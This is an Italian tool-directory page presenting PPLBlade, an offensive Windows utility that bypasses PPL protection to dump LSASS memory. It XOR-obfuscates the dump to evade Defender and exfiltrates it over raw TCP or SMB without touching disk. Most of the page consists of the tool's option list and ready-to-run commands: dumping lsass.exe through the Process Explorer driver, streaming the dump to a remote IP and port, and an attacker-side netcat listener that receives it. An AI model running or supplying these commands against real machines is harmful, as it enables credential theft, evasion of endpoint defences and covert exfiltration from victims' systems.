Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PPLBlade — Elude la protezione PPL per dumpare la memoria del processo LSASS, offusca i file di dump con XOR e li esfiltra da remoto tramite RAW o SMB senza scrivere su disco. | Kitploit
Strumenti/GitHubGitHub/tastypepperoni/pplblade
Escalation di PrivilegiMemory ForensicsExploitEsfiltrazione DatiPost-Exploit
GitHubtastypepperoni/pplblade

PPLBlade

Elude la protezione PPL per dumpare la memoria del processo LSASS, offusca i file di dump con XOR e li esfiltra da remoto tramite RAW o SMB senza scrivere su disco.

Vedi Repository
597632 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PPLBlade

Strumento per il dump di processi protetti che supporta l'offuscamento del dump della memoria e il suo trasferimento su workstation remote senza scriverlo su disco.

Funzionalità principali:

  1. Bypass della protezione PPL
  2. Offuscamento dei file di dump della memoria per eludere i meccanismi di rilevamento basati su firme di Defender
  3. Caricamento del dump della memoria con metodi RAW e SMB senza scriverlo su disco (dump fileless)

Panoramica delle tecniche utilizzate in questo strumento disponibile qui: https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6

Nota che PROCEXP15.SYS è elencato nei file sorgente per scopi di compilazione. Non è necessario trasferirlo sulla macchina di destinazione insieme a PPLBlade.exe.

È già incorporato in PPLBlade.exe. L'exploit è un singolo eseguibile.

Modalità:

  1. Dump - Dump della memoria del processo utilizzando PID o nome del processo
  2. Decrypt - Ripristina il file di dump offuscato (--obfuscate) al suo stato originale
  3. Cleanup - Esegue la pulizia manualmente, in caso di problemi durante l'esecuzione (Nota che i valori delle opzioni devono essere gli stessi dell'esecuzione che stiamo cercando di pulire)
  4. DoThatLsassThing - Dump di lsass.exe utilizzando il driver Process Explorer (POC di base)

Modalità di Handle:

  1. Direct - Apre direttamente un handle PROCESS_ALL_ACCESS tramite la funzione OpenProcess()
  2. Procexp - Utilizza PROCEXP152.sys per ottenere un handle
root@kitploit:~
Usage of PPLBlade.exe:
  -driver string
        Path where the driver file will be dropped (default: current directory)
  -dumpmode string
        Dump mode [local|network] (default "local")
  -dumpname string
        Name of the dump file (default "PPLBlade.dmp")
  -handle string
        Method to obtain target process handle [direct|procexp] (default "direct")
  -help
        Prints this help message
  -ip string
        IP of the remote server
  -key string
        XOR Key for obfuscation (default "PPLBlade")
  -mode string
        Kill or Dump process [dump|decrypt|cleanup|dothatlsassthing] (default "dump")
  -name string
        Process name of target process
  -network string
        Method for network transfer[raw|smb] (default "raw")
  -obfuscate
        Obfuscate dump file
  -pass string
        SMB password
  -pid int
        PID of target process (prioritized over process name)
  -port int
        PORT on the remote server
  -quiet
        Quiet mode
  -service string
        Name of the service (default "PPLBlade")
  -share string
        share name
  -user string
        SMB username

Examples:
PPLBlade.exe --mode dothatlsassthing
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
PPLBlade.exe --mode decrypt --dumpname PPLBlade.dmp --key PPLBlade
PPLBlade.exe --mode cleanup

Esempi:

POC di base che utilizza PROCEXP152.sys per eseguire il dump di lsass:

root@kitploit:~
PPLBlade.exe --mode dothatlsassthing

(Nota che non esegue XOR sul file di dump; fornisci un flag obfuscate aggiuntivo per abilitare la funzionalità XOR)

Caricare il dump offuscato di LSASS su una posizione remota:

root@kitploit:~
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234

Host attaccante:

root@kitploit:~
nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp

Deoffuscare il dump della memoria:

root@kitploit:~
PPLBlade.exe --mode descrypt --dumpname PPLBlade.dmp --key PPLBlade
Scarica lo strumento